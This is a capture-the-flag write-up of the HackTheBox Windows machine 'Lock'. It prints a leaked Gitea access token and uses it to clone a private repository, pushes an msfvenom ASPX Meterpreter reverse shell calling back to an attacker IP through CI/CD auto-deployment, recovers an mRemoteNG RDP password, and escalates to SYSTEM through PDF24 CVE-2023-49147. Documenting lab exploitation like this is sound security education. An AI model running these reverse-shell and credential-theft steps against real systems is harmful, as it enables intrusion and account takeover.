HackTheBox - Lock

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #windows #msfvenom #metasploit #git #xfreerdp

A Windows machine where a personal access token buried in a Gitea repository’s commit history unlocks a CI/CD pipeline — and a commercial PDF utility’s privilege escalation flaw delivers the final blow.

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
$ sudo nmap -sC -sV -p22,3000,445,3389 10.129.234.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-13 04:21 EST
Nmap scan report for 10.129.234.64
Host is up (0.25s latency).

PORT     STATE    SERVICE       VERSION
22/tcp   filtered ssh
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Lock - Index
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open     microsoft-ds?
3000/tcp open     ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=cb0cbe8585860085; Path=/; HttpOnly;
3389/tcp open     ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-02-13T09:24:26+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LOCK
|   NetBIOS_Domain_Name: LOCK
|   NetBIOS_Computer_Name: LOCK
|   DNS_Domain_Name: Lock
|   DNS_Computer_Name: Lock
|   Product_Version: 10.0.20348
|_  System_Time: 2026-02-13T09:23:47+00:00
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2026-02-12T09:09:06
|_Not valid after:  2026-08-14T09:09:06

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-02-13T09:23:47
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.16 seconds

Foothold

There is nothing particularly interesting on port 80.

Browsing to http://10.129.234.64:3000/ reveals a Gitea instance running version 1.21.3.

While exploring repositories, we find one called dev-scripts containing a single file: repos.py.

Reviewing the commit history reveals a Personal Access Token exposed in the initial commit:

1
PERSONAL_ACCESS_TOKEN = '43ce39bb0bd6bc489284f2905f033ca467a6362f'

Enumerating Private Repositories

Using the leaked token, we query the Gitea API:

1
2
3
$ curl -X GET "http://10.129.234.64:3000/api/v1/user/repos" \
  -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" \
  -H "Accept: application/json" | jq

The response shows a private repository:

1
ellen.freeman/website

Cloning the Private Repository

We can clone the private repository using the access token:

1
$ git clone http://ellen.freeman:43ce39bb0bd6bc489284f2905f033ca467a6362f@10.129.234.64:3000/ellen.freeman/website.git

Inside the repository, the readme.md file contains:

1
2
3
4
$ cat readme.md 
# New Project Website

CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver

This indicates that commits are automatically deployed to the IIS webroot.
In other words, any file pushed to the repository will be served by the web server.

Testing Automatic Deployment

We replace index.html with test content:

1
$ echo "<h1>test</h1>" > index.html

Configure Git and push the changes:

1
2
3
4
5
$ git config --global user.name "test"
$ git config --global user.email "test"
$ git add .
$ git commit -m "test"
$ git push

Verify deployment:

1
2
$ curl 10.129.234.64
<h1>test</h1>

The updated content is served, confirming automatic deployment.

Achieving Remote Code Execution

Since IIS is the web server, we can upload a malicious .aspx web shell to gain RCE.

Generate a reverse shell:

1
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.103 LPORT=1234 -f aspx > shell.aspx

Commit and push:

1
2
3
$ git add .
$ git commit -m "shell"
$ git push

Start a Metasploit listener:

1
$ msfconsole -q -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.103; set LPORT 1234; run"

Trigger the shell:

1
$ curl 10.129.234.64/shell.aspx

A Meterpreter session is successfully opened.

Credential Discovery

Inside ellen.freeman‘s Documents folder, we find config.xml, which belongs to mRemoteNG.

The file contains a saved RDP session for user gale.dekarios with an encrypted password.
mRemoteNG uses AES-GCM encryption.

We can use this online tool or mremoteng-decrypt to recover the password.

The decrypted password is:

1
ty8wnW9qCKDosXo6

RDP Access

Using these credentials:

1
$ xfreerdp /v:10.129.234.64 /u:gale.dekarios /p:ty8wnW9qCKDosXo6

We obtain desktop access and retrieve the user flag.

Privilege Escalation

We notice PDF24 Creator installed on the system.
The version is 11.15.1.

PDF24 Creator 11.15.1 is vulnerable to CVE-2023-49147, which allows a local unprivileged user to escalate privileges to SYSTEM through a chain of actions when installed via MSI.

Searching the system reveals:

1
C:\_install\pdf24-creator-11.15.1-x64.msi

This confirms MSI installation.

Following this PoC, we are able to spawn a SYSTEM command prompt and reset the Administrator password:

1
net user Administrator *

Administrator Access

Authenticate via RDP:

1
$ xfreerdp /v:10.129.234.64 /u:Administrator /p:Abc123!

Root flag successfully obtained.

Attack Chain Summary

  1. Personal Access Token exposed in Gitea commit history
  2. Token allowed access to a private repository
  3. CI/CD auto-deployment enabled arbitrary file upload
  4. Uploaded malicious ASPX web shell → gained Meterpreter session
  5. Extracted and decrypted credentials from mRemoteNG config
  6. Identified vulnerable PDF24 Creator installation (CVE-2023-49147)
  7. Escalated to SYSTEM and reset Administrator password

Key Takeaways

  • Secrets committed to Git remain accessible in repository history
  • Personal Access Tokens should be scoped minimally and rotated immediately if exposed
  • CI/CD pipelines can become RCE vectors when repository access is compromised
  • Encrypted credential storage (like mRemoteNG) may still be recoverable
  • Local software enumeration is critical for privilege escalation
  • MSI-installed applications may introduce unintended escalation paths